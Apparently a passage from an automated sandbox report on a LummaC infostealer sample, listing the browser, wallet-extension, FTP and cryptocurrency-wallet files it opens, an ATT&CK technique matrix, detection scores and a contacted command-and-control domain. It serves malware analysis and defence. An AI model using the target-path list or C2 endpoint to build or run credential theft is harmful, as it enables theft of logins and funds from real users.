Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior

Source: Yara match

File source: Process Memory Space: aspnet_regiis.exe PID: 7700, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	13 Virtualization/Sandbox Evasion	LSASS Memory	151 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	13 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
S#U043eftWare.exe	26%	ReversingLabs	Win32.Infostealer.Generic
S#U043eftWare.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Avira	HEUR/AGEN.1301971
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://property-imper.sbs/BW#?06	0%	Avira URL Cloud	safe
https://property-imper.sbs/U	0%	Avira URL Cloud	safe
https://property-imper.sbs/api;	0%	Avira URL Cloud	safe
https://property-imper.sbs/l	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
property-imper.sbs	104.21.33.116	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://property-imper.sbs:443/api	false		high
https://property-imper.sbs/api	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmp	false		high
